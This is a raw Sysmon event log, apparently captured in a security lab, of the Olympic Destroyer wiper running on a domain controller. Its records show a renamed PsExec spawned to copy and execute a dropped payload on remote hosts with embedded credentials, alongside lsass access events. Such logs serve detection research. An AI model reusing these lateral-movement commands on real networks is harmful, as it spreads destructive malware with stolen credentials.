154100x8000000000000000292082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.346{C8EA50B7-12FF-6216-E505-000000003802}2216C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.22 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.332{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FF-6216-E505-000000003802}2216C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.332{C8EA50B7-12FF-6216-E305-000000003802}7044C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.332{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FF-6216-E305-000000003802}7044C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.332{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FF-6216-E305-000000003802}7044C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:03.316{C8EA50B7-12FF-6216-E305-000000003802}7044C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.279{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FF-6216-E405-000000003802}6816C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.279{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FF-6216-E405-000000003802}6816C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.279{C8EA50B7-12FF-6216-E405-000000003802}68162860C:\Windows\system32\conhost.exe{C8EA50B7-12FF-6216-E305-000000003802}7044C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.263{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12FF-6216-E405-000000003802}6816C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.249{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FF-6216-E405-000000003802}6816C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.132{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12FF-6216-E305-000000003802}7044C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.132{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.132{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.116{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.116{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.116{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{00000000-0000-0000-0000-000000000000}7044C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.131{C8EA50B7-12FF-6216-E305-000000003802}7044C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\igmp.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 23542300x8000000000000000292064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.116{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCE271FDC6924C9AC18CA12B4A8D5CD9,SHA256=AA5F06A370867BB886A5847AEA40E55B9E7AB16950D4011BC65331E86CC3D25A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.116{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}7044C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.116{C8EA50B7-12FE-6216-DF05-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.115{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.115{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.115{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.115{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.114{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FE-6216-DF05-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.114{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FE-6216-DF05-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:03.094{C8EA50B7-12FE-6216-DF05-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.079{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FE-6216-DE05-000000003802}7132C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.079{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FE-6216-DE05-000000003802}7132C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.063{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=70687998FC8EB3349C0DBF245DFF3D06,SHA256=3440022DF53ACC0E2EE8BC85AF4BEBED6098CADA046EC375EBBC791EA5E3B693,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000292051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:03.063{C8EA50B7-12FE-6216-DE05-000000003802}7132C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 